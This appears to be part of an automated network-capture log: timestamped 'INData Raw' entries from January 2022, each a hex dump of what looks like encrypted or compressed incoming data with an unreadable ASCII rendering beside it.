                                                                                                                                  2022-01-11 22:39:10 UTC5382INData Raw: aa c6 f7 8b 57 55 de 7d 18 5c 91 76 d0 35 53 60 99 7f 7e 33 46 91 32 bc fb b1 c7 c4 f3 e1 01 b1 b8 f7 20 c2 25 b5 9e be 9c a7 9a a5 ef 5f cf f8 3b 6d 37 1e d6 76 7b 81 bb 8c cb 5b fc c6 36 36 43 c5 91 f1 de cc 06 1d 54 03 59 44 1a 99 d7 54 55 a6 33 65 95 61 55 fb e5 7a 6a 4c 8f b1 69 e1 81 ef 44 72 2c 8a 5b 85 eb ec 59 de d6 ef 3b 13 41 c0 3c ff 2f f9 09 01 80 4f 85 bd 74 25 02 49 41 9e 54 e1 44 f2 c1 34 9a 32 d8 74 3d 31 f8 b2 ed a3 8c 93 33 ba 12 e8 1b b9 21 25 94 9a 79 aa 73 71 04 46 cb 50 36 ba 4b 7e 17 0a 30 b2 a2 d5 8b 2d ec dd 7e 1b 06 df 19 61 27 81 91 6b a6 00 ab 53 c7 8c b1 3e b0 fb 08 75 ed 4d ea dd f9 ef d6 fc 8a 1d 68 71 90 eb 1a 91 9f 3e d4 48 89 cd 7b f8 52 5a d0 a4 14 40 e7 06 78 eb 42 77 1b 06 10 26 2d b8 10 b2 70 c7 18 b3 d9 3b bf 3b 69
                                                                                                                                  Data Ascii: WU}\v5S`~3F2 %_;m7v{[66CTYDTU3eaUzjLiDr,[Y;A</Ot%IATD42t=13!%ysqFP6K~0-~a'kS>uMhq>H{RZ@xBw&-p;;i
                                                                                                                                  2022-01-11 22:39:10 UTC5398INData Raw: 35 61 95 7e 0b cb 6c 59 be 87 17 59 b6 04 f7 97 9b b6 73 1a 52 53 2a d2 fc 01 1a c9 db 18 65 62 ad 29 5f 8e f1 4c a0 a5 d3 86 99 28 97 91 85 dd 92 22 14 e2 e5 35 ef 98 77 48 7f 24 a9 fd d6 65 94 10 79 96 02 c7 fc 3f 0d a3 0d 1e ea fe 81 06 34 8a 78 ba 6a 5f 22 a0 a1 b4 d2 60 9d 6e cb d1 9e 1b 62 00 c5 3f c3 9d a6 73 0f 90 97 58 88 9c f1 d5 9f ac d0 f1 82 44 ae 90 ee 66 0d 07 43 a7 3a 2e 3a 1e 86 17 70 c6 c4 c6 e3 be 52 7d ba 93 2b fb 98 08 c7 c3 76 b2 ad 45 80 a6 28 84 fa f5 5d 84 df be 77 fb a9 85 22 be 1f 6b 4c e9 e7 ac 5a 71 0c 71 f0 33 6f 3b 70 1c 3f 61 8e 01 f5 0f 11 d4 22 e9 bc bf b8 33 61 d9 e5 e0 d9 ef 2f ea 2d bb f7 63 ad 20 93 43 5f 19 8b cb 24 7a 00 06 f7 b0 f1 6f a3 b5 f8 b8 a7 7b b6 79 c5 2e 6a 61 1b 23 18 70 5f 35 1c c8 65 d4 c3 da fc 44 fc
                                                                                                                                  Data Ascii: 5a~lYYsRS*eb)_L("5wH$ey?4xj_"`nb?sXDfC:.:pR}+vE(]w"kLZqq3o;p?a"3a/-c C_$zo{y.ja#p_5eD
                                                                                                                                  2022-01-11 22:39:10 UTC5414INData Raw: d2 2d 8b f1 dc 47 79 eb bd 6e a8 29 ca 46 fc 48 96 f8 76 7e 29 b8 22 28 72 bc af 38 93 c3 29 99 06 0a da 99 12 f6 5b c4 b7 b5 1c 2f 8b 3a 37 4b 19 6a 06 a1 d4 6f e6 b4 22 d1 88 b3 92 03 d9 c5 9a 33 12 08 29 ed ef 76 b0 d1 3c d0 b0 bc 7a bd 57 81 3b 6b 4e 20 91 37 5c 17 35 c1 12 5f 80 76 c7 b2 61 78 51 b3 b6 c6 b8 43 52 18 4e 6b 4d a5 f1 19 0c f1 5b 21 a8 63 fc a2 3b 47 47 c1 dd 8c 91 d0 ac 1b 31 70 ec 9e c8 00 ff b9 7a c2 96 93 6a 0f db 6f 5e b9 90 55 6d 48 e5 47 b9 81 30 a8 99 c5 03 73 df b9 e5 4d ba 5a b7 93 2a 5e f4 59 ef 1e 08 87 2a 72 a8 2a 51 90 85 83 a3 09 52 bc 16 58 80 0b 5a 95 d1 a7 ce b4 a0 1f 94 2d 7d 16 58 23 14 da 7a 00 ef 7c 2f 58 36 3d c2 bb 3f 3e 07 07 6c 1b d7 8b 85 92 26 4f 28 48 fd 17 a4 80 46 e8 5a ea 3b 91 93 fa 7d 63 79 a7 52 10 5a
                                                                                                                                  Data Ascii: -Gyn)FHv~)"(r8)[/:7Kjo"3)v<zW;kN 7\5_vaxQCRNkM[!c;GG1pzjo^UmHG0sMZ*^Y*r*QRXZ-}X#z|/X6=?>l&O(HFZ;}cyRZ
                                                                                                                                  2022-01-11 22:39:10 UTC5430INData Raw: 23 03 25 9d f8 a2 9f ba 32 c4 8f d5 5f c7 af 9e 8b 6c 11 87 bb d2 33 19 d5 62 24 7e b7 03 d9 09 77 ce 71 4d 97 30 46 c7 3a a4 44 39 10 81 fa 37 6d a2 a9 95 62 00 e3 93 2c 04 42 0d 33 13 8c 38 88 fb e2 e0 ff 10 aa 9f 9b a7 05 7c cb 34 a5 ab ae 0f 24 8e ed e0 21 df 7e b1 18 93 ed ee 65 4a 79 43 a3 83 72 ce 96 ab 25 40 84 aa cf 44 0e fb dc d6 cc e3 53 d8 77 cd 9b 7a 2b 3d 79 3f f7 dc f5 9c 7a 05 17 d4 18 8a 9b f3 c8 0c fa e8 3e 37 21 34 7d f5 0b 15 50 4f 10 c4 eb 33 f9 c8 58 69 d3 45 7c ea 72 7f fb 07 e1 f6 9d 98 ff 57 83 68 cd 44 a2 80 27 5f f6 5e d5 d3 0f 57 e0 0a ad 7a 6e a1 99 4d 49 39 d4 ec 83 63 bd 4d 1f 70 98 64 cc d2 26 e4 14 e5 1a 87 dc 49 57 2f c4 77 44 6e 8e 2e 88 c2 d7 f0 a1 f5 ed f1 cc d8 55 af 57 49 07 4b b7 e5 ab bd c5 4f b1 9d 1a 69 0c 64 e7
                                                                                                                                  Data Ascii: #%2_l3b$~wqM0F:D97mb,B38|4$!~eJyCr%@DSwz+=y?z>7!4}PO3XiE|rWhD'_^WznMI9cMpd&IW/wDn.UWIKOid
                                                                                                                                  2022-01-11 22:39:10 UTC5446INData Raw: d5 f6 77 69 32 7b a9 56 7b 6a ef 91 da 35 a5 c2 b8 5a 93 2e 31 75 11 b3 c5 79 d4 0f 8a fb 76 9e cf 92 15 a6 fd ab 33 a2 ab 5b 56 06 06 50 ef e6 50 20 61 69 63 e2 98 f7 22 70 6d f6 34 2d 95 de 62 fa 9c d1 04 ef d7 99 53 d2 c2 df 52 d1 22 d6 34 a1 25 49 83 4e a7 97 bf a2 5b 05 ec c0 f4 e6 55 2e 18 09 5e 15 2c 6c 1b 26 e7 a4 6f ff 98 3f 2b 5b 3f 2a 58 f7 06 6e 1a 4b 84 f3 38 7d 95 ee 1d 0c fd 2b 23 a0 0d 6c 54 c9 46 4d a4 aa 23 92 84 40 e5 ad ba 21 7f 59 ea 25 5a e0 9e e6 24 fc fa 86 e6 1e 63 85 32 54 e9 67 ad aa a4 4f c6 37 74 55 7b eb a4 1b e9 08 bc 5c 6a af 2f 43 ab d8 23 0a fc f7 6e ca 41 22 ca a4 6e 7e c7 ec 06 47 c4 bc f2 90 7a 4d fe 22 02 0a 5c 0e 5d 16 9f 90 bd 80 87 3c 09 e8 b4 71 dc ea ac 41 98 56 e6 a8 86 37 76 eb 8c 87 01 a4 5a be 3e 0f 10 6a 17
                                                                                                                                  Data Ascii: wi2{V{j5Z.1uyv3[VPP aic"pm4-bSR"4%IN[U.^,l&o?+[?*XnK8}+#lTFM#@!Y%Z$c2TgO7tU{\j/C#nA"n~GzM"\]<qAV7vZ>j
                                                                                                                                  2022-01-11 22:39:10 UTC5462INData Raw: 7d ac 71 1b 01 58 3b 75 65 4e a0 22 28 b7 92 d0 33 b2 dc e5 75 64 7b 11 7c f2 53 68 2e 1b eb c4 5e 8c 5e b4 4d f2 8a 57 19 23 73 23 bf a6 ac c3 41 2f df fd 59 db 34 45 87 69 6a 62 a1 bc 58 b2 d1 95 9d 3e 9e b5 fa bc 34 6d fd 8d 21 84 7f 92 a8 04 64 a6 39 a7 0b 02 e1 d3 f7 1e 8b 40 b1 2c 9f 16 6c 9d 49 2c a2 34 2a c5 78 39 89 16 c8 ba 9a 83 cb 6a 44 bf c2 4d 0e 19 80 6f eb e0 ce 21 77 67 19 c0 15 0e 4d c8 be ec a3 44 2c 02 c6 5f d0 01 4b 8a 64 ce 5a 7d 6b 9a d8 5e 75 62 39 ae a4 ce 93 b0 da cb 56 87 fc 7f d6 d4 7b a2 24 51 38 1e c2 4f d7 dc 88 a6 fb 0a ec b1 a2 6c d5 16 a0 34 0a b0 d5 14 53 4d b0 e0 7f 5a 51 d7 c7 08 9c da da 06 03 9e e6 34 62 47 aa 1d 30 7f 03 26 94 7e cc 9a c2 ce c7 db 02 79 86 8a 72 e0 b0 25 7a c3 59 e2 51 d0 28 db 50 1c 6b 5f 04 05 24
                                                                                                                                  Data Ascii: }qX;ueN"(3ud{|Sh.^^MW#s#A/Y4EijbX>4m!d9@,lI,4*x9jDMo!wgMD,_KdZ}k^ub9V{$Q8Ol4SMZQ4bG0&~yr%zYQ(Pk_$
                                                                                                                                  2022-01-11 22:39:10 UTC5478INData Raw: 52 2d fc 65 69 49 61 5d 5e 2f 97 e8 ae 2a 07 23 15 f9 dc 26 da 1e 06 13 a2 16 c8 4b c2 34 79 95 ec 7c be e0 4f fc 6e d9 0c e9 29 3b 41 8a de 9f 8c 99 c4 22 5f 41 39 4c 18 54 2a c6 ca dc 41 c2 f4 7b 23 74 fc 45 c4 84 55 b3 05 00 6d 91 7c b1 22 91 70 08 7c 7b c5 39 37 9c d4 31 1e ba b1 60 91 01 44 61 79 47 46 5b c3 44 78 86 c9 64 04 14 cb 66 88 87 41 66 9b 03 a9 72 ef 5e 94 eb d2 1e 5f e5 09 77 b2 c8 57 90 c7 11 60 4c d2 40 45 74 96 21 52 af bc 7b f0 e2 c4 8b 45 a2 b1 72 87 17 52 f9 fa f4 02 ac a6 fb 0a b6 23 70 d3 b8 71 80 48 1c e0 09 66 23 e7 33 13 3a 54 ff ce 25 85 6b ea f4 c9 19 33 39 dd ba fd e1 34 a5 63 2f 50 3a 45 06 56 c9 8a c3 69 f6 c2 f6 0a 3e 76 03 50 a2 7c 7f 41 5c 01 4b 64 4f df 50 07 92 2b 0a 65 0a 01 1e df 1e a6 9f 2c b4 44 63 77 1e e9 cf e3
                                                                                                                                  Data Ascii: R-eiIa]^/*#&K4y|On);A"_A9LT*A{#tEUm|"p|{971`DayGF[DxdfAfr^_wW`L@Et!R{ErR#pqHf#3:T%k394c/P:EVi>vP|A\KdOP+e,Dcw
                                                                                                                                  2022-01-11 22:39:10 UTC5494INData Raw: e7 bd eb 99 2d 29 24 ac 3a dc 7d bc 12 9d db 0a 91 d0 30 c1 07 02 f8 d3 ad 26 24 a1 47 e2 08 3c 9b e0 73 9b 89 6a 10 f6 c1 97 45 86 ec c2 fa c8 c2 5b 34 53 a6 fe a2 ca c9 80 80 2f a3 25 33 e9 db 7b 77 63 a8 48 fa a8 c8 de 64 2d d7 72 14 90 1c c2 c6 67 9d a3 a7 0b 2d d0 be 41 d5 6a 5d 2c e9 fd 42 bc bc cd df 42 5a 71 0c e8 42 ea 48 4b 2c df f5 96 01 52 a9 f7 d7 a6 2b 93 3b 84 d7 80 3a df f4 cb f4 b6 7a 7e b2 1f e5 c6 0e 78 43 a2 8f 3e 4c 3a 47 4d 57 15 dd 05 a7 b9 4c d6 c8 91 4d 9a 6b 16 cc 5c 3a 9e e9 0e 77 1d 2e 50 e3 e3 6c 08 2b 88 02 0e f9 fd 6a 65 d5 b2 ea fa fc 0d 68 b7 9c 33 b3 75 4f a8 57 65 35 d6 42 9b bf a8 6f b8 79 d3 24 ae 57 5c 2b 08 1e 32 fa 6f 1d 50 6d 62 86 54 ba 5b 0f 9e 81 d6 22 cd 38 a4 73 19 84 c3 af 1f 7c d6 57 3b 64 47 ee 74 e2 0d e4
                                                                                                                                  Data Ascii: -)$:}0&$G<sjE[4S/%3{wcHd-rg-Aj],BBZqBHK,R+;:z~xC>L:GMWLMk\:w.Pl+jeh3uOWe5Boy$W\+2oPmbT["8s|W;dGt
                                                                                                                                  2022-01-11 22:39:10 UTC5510INData Raw: a1 0f a8 aa 4a e3 bc e2 e4 f2 b0 04 92 15 29 c6 6c 40 0a 7e 16 6d 5c ea a3 3b 6c ea ee 86 59 d3 eb 10 29 a6 d9 70 95 dc 6f c3 51 12 8c d0 90 0f e0 53 79 84 d7 c6 1e 0b 26 b4 7e bd 51 a9 28 2e bc 33 e6 27 eb d4 5b b8 65 7d 2b aa 2e 50 9c dd 32 2c aa a4 bc 57 a0 a5 3e c6 50 ff 13 af f7 75 df ee 55 78 0d af e0 cd ab ea 5f 06 36 4a 2b 33 1a 91 e3 37 8a 4c 12 25 14 83 c5 a1 ba 43 36 01 98 e2 d5 98 23 f5 b0 5a 82 b1 cb 9b 9b 49 e0 0f 1f 0a fd 93 87 e2 a1 04 58 28 b4 1b ef c9 0c b0 2d 3b 29 e4 1c 4b 97 93 78 ca cc 46 fd d3 19 2c 3c f5 62 10 2e ad 04 7c 26 ee ec 6f c9 8e 51 06 18 6e ee 1b 1b 36 c9 43 e5 d4 22 e7 bc b1 e9 bb c5 9e 4f da 43 e2 63 cd 89 81 ea ae 3a 16 05 44 90 6a 26 1d 89 97 fc 2c a5 23 ff f2 42 06 58 89 67 08 72 6d 1a a5 28 f4 09 52 ce 9c 99 f8 1f
                                                                                                                                  Data Ascii: J)l@~m\;lY)poQSy&~Q(.3'[e}+.P2,W>PuUx_6J+37L%C6#ZIX(-;)KxF,<b.|&oQn6C"OCc:Dj&,#BXgrm(R
                                                                                                                                  2022-01-11 22:39:10 UTC5526INData Raw: 21 12 6b e3 08 4f f2 40 53 7a 4a 80 bb 39 08 43 d4 cf fb 39 f6 40 d5 cd 8c 1c 3c dd f2 4e 7f 3c 72 26 4e b8 4a d3 13 45 5a d3 88 19 c7 2a 95 66 4a 2b 54 32 14 47 6b 30 33 43 ba e1 2d 51 3a 37 f1 0b cc 65 6c fc b2 01 5b 5e c2 10 76 df b7 28 dd fa 34 4d 2c b6 0d 16 81 b3 4b 09 75 7e dc 73 dc 17 7e b4 d8 e6 7b f0 55 6e 60 31 17 a4 25 4b 4a c2 cd e8 81 15 3c 94 3f 1c 0b a1 5b 6f 1d ad 68 7a 6f 5a 6a a3 e6 12 d7 2c 61 73 b6 13 3f 3a 80 b0 6b 22 66 04 03 96 b2 73 7d 65 c9 ce 75 e5 ff 1f 7d c8 11 86 ac 8b 51 dd c6 a2 8e 50 1d b7 65 82 f8 b7 2e e6 97 53 a7 8f 9b 46 1c fb 6c ed 65 da 8b 12 2e 9f f9 c3 c9 fe 17 21 ba 37 08 3a dc 2b ee 2c 46 d5 07 1f a7 da 9c ab 45 2f cd 76 89 a3 b4 92 46 ef 44 23 7f 02 ae e9 45 bf 06 ff 29 5d 86 3f 9e f5 01 54 dc 0c 63 7e bf 8e 2a
                                                                                                                                  Data Ascii: !kO@SzJ9C9@<N<r&NJEZ*fJ+T2Gk03C-Q:7el[^v(4M,Ku~s~{Un`1%KJ<?[ohzoZj,as?:k"fs}eu}QPe.SFle.!7:+,FE/vFD#E)]?Tc~*
                                                                                                                                  2022-01-11 22:39:10 UTC5542INData Raw: bb 28 2c d0 e1 26 fe 16 8b d9 43 a6 0d 17 c6 66 66 6b c3 1a 8d 0c cc fb e9 e9 c1 cc 36 19 8c ef 14 d6 0c b9 c4 ec b6 87 b6 8a 78 0e e3 02 4d 5d 8e f8 0e 25 18 94 74 84 30 cd ce 98 7e a0 50 b2 5d 43 97 8e f8 7f f5 28 5d 34 7c 2d f4 06 b7 cb 6f df 81 44 a1 fc 4c f3 fd 83 01 a1 64 f4 be ca fe 8c 9e ef bc 4e f5 ae dd 67 64 52 e6 6d 0a 21 81 88 29 15 61 67 89 e2 ce 4f 7b 31 63 5e b0 ed 57 ef b9 5c f5 83 a3 cf fc f6 e2 13 ff 14 e8 fe 2f f5 ae 8c 9b ab af 0b 94 bc 7e b9 74 85 d8 0f 4c 88 c0 2e d2 64 a0 46 a3 da b9 fb 98 2e 01 c3 7e 2d c4 a2 eb 79 65 94 fc 25 f9 a9 58 c7 09 15 3a 40 1f 6b fe e5 9c bf 8b be 08 df a7 13 6e 4f b2 10 24 24 fa 6c d5 51 cb 5b 55 93 36 52 c3 a2 20 35 32 8a 8f 2d d7 62 35 5e 8a a8 99 ac c2 62 7d 87 69 57 99 56 33 38 e8 a0 1f 69 69 a3 6e
                                                                                                                                  Data Ascii: (,&Cffk6xM]%t0~P]C(]4|-oDLdNgdRm!)agO{1c^W\/~tL.dF.~-ye%X:@knO$$lQ[U6R 52-b5^b}iWV38iin
                                                                                                                                  2022-01-11 22:39:10 UTC5558INData Raw: c2 62 61 e0 01 81 5e 18 8c d4 18 bf 04 cc e9 b6 0b a6 88 15 da e5 26 47 43 68 9b 63 78 fd 59 01 9a 1a 5e d6 4b c4 0a 83 a1 f0 ac d1 c0 e1 73 f7 e0 ea 3b 3b 7c c0 05 c1 7c f3 0a 3b 3c b3 62 72 e3 b1 1b 20 f1 ed 38 b9 53 0f df 7e 47 dc 2a 9c 70 c6 2e 0a 70 88 5d d3 88 a2 06 16 d7 38 91 47 46 5b 86 59 2a 8d 77 f6 d6 94 28 0a aa 13 89 69 4b 7e de 57 15 e6 3e 03 49 88 ce 9c fa 33 4f 14 d6 d9 84 cf f2 05 e0 d5 cc 14 b1 13 e7 2d c2 67 c9 b1 1a 90 eb 5d 08 46 a5 49 2c b2 53 1d 40 75 01 c1 d0 a7 6a f4 85 7e 65 36 57 a1 b9 8d 19 73 c3 99 c7 67 20 b3 d4 8d 0a 5b 5b a4 93 e2 6b fc 8c e3 a9 94 74 90 3e b3 ef 41 ec 9b 12 f2 35 21 bd 17 d2 06 c8 2c 4f 67 3f bd 9b 19 e4 7e f4 9e 36 65 74 be 3e 0d 36 c7 76 97 19 44 70 d1 e4 f4 86 4c 0d 0d bd d0 d9 24 50 c7 99 33 74 5d b8
                                                                                                                                  Data Ascii: ba^&GChcxY^Ks;;||;<br 8S~G*p.p]8GF[Y*w(iK~W>I3O-g]FI,S@uj~e6Wsg [[kt>A5!,Og?~6et>6vDpL$P3t]
                                                                                                                                  2022-01-11 22:39:10 UTC5574INData Raw: 9f 8d 73 c1 9f 6a ee 65 c6 6e 6d 6d 6e ba e2 68 9f 87 dc d3 6f 40 26 66 f3 69 e6 8b ff 78 88 d4 1b 34 a4 d5 07 9d 1a 64 86 1d 93 d9 7f 51 2e b6 86 ef 9f ca b6 82 1c b4 16 6c e1 57 7e 4e 7c 05 57 b8 04 97 9b 6a 5f 9d 0c a1 5d 80 e4 a5 cf 63 d8 a9 a4 00 7f a9 34 aa 64 f4 3e 4a 33 8b f3 39 27 82 7f 5c 9b 75 84 36 6e bd 70 d2 9b ed e1 a4 74 7c 80 04 36 83 9d 52 69 64 4a 97 59 48 c8 84 77 21 bc 1b 0f 76 40 82 d0 ea 2f 0f a7 a7 5e 6a b7 12 af 27 0b 8a e6 a0 76 9f bf 78 00 87 70 c0 97 ed e6 f0 ad 85 50 30 0f 0c 88 fb e6 1c 8e df 12 47 b6 40 c1 b0 d3 b0 d7 72 f1 53 52 a2 fc 1a 5e b8 13 8d b9 35 54 a7 12 4e 90 de 87 0d 0b c6 88 1c c6 a5 03 14 87 24 a1 ea f2 bd 6c ba f6 8e 8b 2c a1 82 50 38 0f 59 6b a6 35 0f f1 a0 91 44 af 76 52 e6 5b aa 79 34 57 d1 51 02 89 24 b7
                                                                                                                                  Data Ascii: sjenmmnho@&fix4dQ.lW~N|Wj_]c4d>J39'\u6npt|6RidJYHw!v@/^j'vxpP0G@rSR^5TN$l,P8Yk5DvR[y4WQ$
                                                                                                                                  2022-01-11 22:39:10 UTC5590INData Raw: 06 e9 50 9e 93 c8 8e a1 c4 4d 3d c2 8c d6 c4 66 a7 77 b8 ec cb 6e 91 a2 41 1e 31 64 1c 52 0d 9c cb 54 2d a7 15 e9 d7 76 78 d0 30 f1 53 d0 92 27 ba 7a ee 09 c0 41 d7 d8 00 cc ac 42 8f e0 f6 3f 78 a1 53 6e eb f3 68 16 40 9d 97 89 f8 8d ce f5 cf 4d d4 4a 84 6a 56 5a d5 9c 9d c2 68 07 16 90 a3 99 b8 d4 74 80 8a 53 a6 d0 0b 82 1a b1 57 1a 1d f7 0a d6 b4 e1 10 0d be 23 79 eb 6c 1b a1 8b 83 fa 3f 03 ba 33 1a fa 64 07 82 c7 08 69 17 1b 72 2d 07 1d 99 a5 dc 8f 90 ee 2d fa e8 41 ec 79 66 94 ac 56 6a f9 5b 18 a7 68 d7 c7 00 1c 77 3c c5 5d bf 53 d4 db 1e 57 2e 6e 46 b7 d6 c9 c1 b0 67 63 ef c6 78 c6 ac dd 9c ac a2 85 3d 78 24 c6 86 83 9b ce 46 bc 56 e1 09 2e bf 59 f8 ca 61 f9 e6 30 0f 35 10 8a 6c 84 65 32 45 ac 62 60 14 81 89 a1 1f ff d2 e2 37 d3 a7 84 c0 a9 3b a4 26
                                                                                                                                  Data Ascii: PM=fwnA1dRT-vx0S'zAB?xSnh@MJjVZhtSW#yl?3dir--AyfVj[hw<]SW.nFgcx=x$FV.Ya05le2Eb`7;&
                                                                                                                                  2022-01-11 22:39:10 UTC5606INData Raw: 13 93 01 f9 fa b3 fa fa 64 90 1c 8d 32 6a 4e 66 0d c7 4f 88 ee 3f d3 29 dd f8 b8 8a 38 fe 6e b2 77 2f 94 11 d3 c2 9b 48 6c 60 f7 ad 1f 00 4a b2 7f 6a 30 97 65 5e 9e e9 49 9e 66 ed ec f7 78 45 73 4d 76 b1 50 84 5c 2c 26 44 8c ee e8 b1 9d d7 15 93 36 e8 12 83 14 b1 2d 19 59 98 fc 6e 52 cd 59 b8 e5 ae a2 56 f2 57 0e 1d b6 36 33 71 d9 db 5c c0 4c 9f 85 12 4b a4 cf e9 29 32 c0 a6 2a 32 5f f3 bc 92 5d bf 6e e0 84 89 bc c0 81 f3 26 82 a3 a6 3f 57 37 3a 6a 73 e4 22 5d c7 47 ed 58 60 d2 26 51 50 41 79 73 71 1f 80 16 fc 01 12 e2 06 b9 e2 35 c5 82 66 df 2f 63 97 de 3e 9a fe 9a c9 03 15 44 66 4c 15 d3 53 dd 28 0b cf 56 c9 ea 68 f5 f0 f8 82 78 9a 61 a6 a1 2c a6 16 c0 45 27 e2 65 be c3 97 dc ac 65 69 45 9b 61 a3 9f 83 c2 f2 10 45 69 3e cf d2 80 c9 55 9d 37 4f 75 d3 2b
                                                                                                                                  Data Ascii: d2jNfO?)8nw/Hl`Jj0e^IfxEsMvP\,&D6-YnRYVW63q\LK)2*2_]n&?W7:js"]GX`&QPAysq5f/c>DfLS(Vhxa,E'eeiEaEi>U7Ou+
                                                                                                                                  2022-01-11 22:39:10 UTC5622INData Raw: 3f 76 de ce 79 42 82 ae b7 27 84 10 36 24 13 d7 82 4e ef 08 38 af 13 59 5f da 7d b7 1e e0 45 70 42 66 2c 6a aa 42 c9 d2 98 55 06 c7 dc ef e2 6c 2b 56 b7 42 68 95 c6 1c 41 9b e8 f2 6c f3 43 09 63 63 bd 22 c9 c1 23 ad bb 06 a3 8c 61 28 fa 4a 87 ee 5a 20 4e c2 2e c2 d4 60 df 70 c4 6f e6 80 0d 47 ec 8b 67 aa 4b 75 d3 e1 e2 35 e6 27 b5 33 95 3e a1 ae 55 af dd 9f c5 b6 92 33 ad 4e d3 49 79 e9 18 8a be b9 03 1a 74 85 35 57 35 b5 48 f2 b3 bb ea 9b fe 52 ef 23 a6 22 da bc 06 38 e4 18 57 8e 2d 05 90 e6 f5 7f 2b 1e 92 b2 bb 11 15 c7 b3 83 b3 00 86 ce 0f f6 da 16 10 9a 9c 1f a7 0d c6 8d 9b c2 b1 51 65 1e 30 29 54 c7 fc 9b e0 c3 7d 74 bd 98 68 a5 95 60 cb 8b 9a ab d1 50 53 2a 98 57 23 0d 16 57 d9 46 a5 47 01 70 1d 41 a6 cd 39 ec 87 c0 7d bf f3 41 56 bd 37 22 d8 04 88
                                                                                                                                  Data Ascii: ?vyB'6$N8Y_}EpBf,jBUl+VBhAlCcc"#a(JZ N.`poGgKu5'3>U3NIyt5W5HR#"8W-+Qe0)T}th`PS*W#WFGpA9}AV7"
                                                                                                                                  2022-01-11 22:39:10 UTC5638INData Raw: 97 ae 23 1e fe 59 16 62 c5 66 e4 75 59 44 b1 ef 51 2b 0b 25 a4 9b 97 c5 ee 97 05 67 39 37 97 f4 38 29 b7 13 4f 5f 32 f4 27 5d 9d 15 56 36 aa ef 2a 67 39 4f 64 4d 00 63 b7 37 79 26 3b 2f c3 47 1c e0 2a 2c 25 e0 5e 31 27 f4 1c 86 c6 4f 4a d2 67 f4 8c 28 96 32 91 38 71 55 a5 be ba c0 87 15 bd 2f 97 5c ce 16 58 b3 9c 4c 6d 60 cc 60 68 d4 bb 5a 42 83 6d ac 58 3a cb 45 1a 30 35 a0 88 0c 91 ca d5 6e 23 3a dd ba b8 28 4f e4 12 a9 19 bc b2 6f 5a 00 62 55 d9 b9 26 2e 49 7a 1e 42 d6 c1 a3 d6 0d 19 e6 3d 3b f8 c2 f9 72 87 4d 75 45 07 36 7e 98 bc 25 eb 76 4a 93 4b 44 51 94 4f 50 08 a9 07 54 c5 4d 60 9c 1e 7e 08 2f e6 2e c5 96 8e 33 6a 19 4d 27 2a d9 ce ee 23 f3 86 1e ea 54 bf 29 50 83 38 7f 36 ae a7 62 8b 8b cd 7a b4 24 a4 7c ca 63 00 92 2d 87 57 92 c0 d7 04 e3 0c 01
                                                                                                                                  Data Ascii: #YbfuYDQ+%g978)O_2']V6*g9OdMc7y&;/G*,%^1'OJg(28qU/\XLm``hZBmX:E05n#:(OoZbU&.IzB=;rMuE6~%vJKDQOPTM`~/.3jM'*#T)P86bz$|c-W
                                                                                                                                  2022-01-11 22:39:10 UTC5654INData Raw: 27 64 d0 25 1a af 9a 3a 4a 23 be 80 ce 24 d5 35 f1 06 97 2d 24 0f 82 81 09 ae 29 2d c3 6d f9 ba cf 2b 39 89 87 0f 82 98 de 93 51 4c 1a fc 2f ba ca 01 3f bd 0e c5 d9 9b 27 7b fb 89 a8 0f 48 9a 69 f3 28 53 4f 40 64 ae 30 9a 7a d0 c6 51 1d d5 75 26 ca 8e 25 59 e3 79 d2 27 9a af b4 60 c5 0d 01 94 73 ad 19 6e 45 64 57 43 6a 6c 8c 53 3d 42 22 bc 0e 0a c0 70 d3 b8 f3 d4 2c a2 38 2f b4 3b 73 c5 16 6c 60 93 ec a4 1b cb ab c1 0e a1 a4 16 21 7e d6 d5 10 6b ee bb c2 bc 34 bd 70 a2 d1 95 6c bb 8c c2 ab e4 32 d0 a1 b9 c6 e1 56 05 ad 1f 03 6c 30 a0 95 7a 7c e4 c8 8e 91 87 c1 fc 26 e2 dd ef 18 fd 29 97 80 15 ad 5f d3 37 ed 7d 1f 0b e0 74 08 41 5f be 93 89 ba cf fe ae 15 48 f3 68 bb 0a 06 93 c6 45 85 0d e5 c1 78 12 7e 35 77 35 d2 02 ed 8a 3d 5a 95 7f 47 b0 62 fe 1d ac 11
                                                                                                                                  Data Ascii: 'd%:J#$5-$)-m+9QL/?'{Hi(SO@d0zQu&%Yy'`snEdWCjlS=B"p,8/;sl`!~k4pl2Vl0z|&)_7}tA_HhEx~5w5=ZGb
                                                                                                                                  2022-01-11 22:39:11 UTC5670INData Raw: 7d 65 67 57 fb 76 96 e8 0c 52 f4 5c 11 a9 1f 0c b3 8e 87 de 69 ad 34 85 82 b2 e1 e2 8f 56 60 73 b1 df 0d 92 c3 74 fa b3 62 71 5a 66 a3 f2 ef 08 61 19 a1 b0 3b 0f 57 5c 70 65 fe 99 de 0d 17 e1 35 d0 5d 60 45 5a 29 23 ad fd 58 b2 e7 a4 64 52 18 06 2a 24 44 c9 a6 14 ac 80 7d 34 85 7e 93 a3 cf 4e 59 eb b3 33 7b 3b 34 82 e3 01 bc bc 06 ff 5c a7 ab 03 73 21 63 fb cd d3 84 bb bc c3 b5 8d 0e 90 16 15 38 95 75 d7 35 48 e8 32 00 ba ce ae 0c 32 d9 b1 75 f7 bc 7b a1 e5 c8 a7 16 fa 8e 7f 43 d6 d1 2a 82 6b 15 ee 09 51 9b 5d f3 06 8d a2 7e be 72 78 6d 37 be 58 19 1d 11 55 96 ca 87 b6 ab 33 c5 a1 e3 24 51 6c 42 d5 98 95 80 98 da dd 90 72 3e 58 8d 70 88 cc 33 c9 bb 4d 9b f0 9d 1b b5 4e 9c eb 4e 18 87 e4 e1 ee 42 7d 1d 44 58 7b e3 74 5e 4d 6c 69 fa af 58 9e 7b be 04 4d 71
                                                                                                                                  Data Ascii: }egWvR\i4V`stbqZfa;W\pe5]`EZ)#XdR*$D}4~NY3{;4\s!c8u5H22u{C*kQ]~rxm7XU3$QlBr>Xp3MNNB}DX{t^MliX{Mq
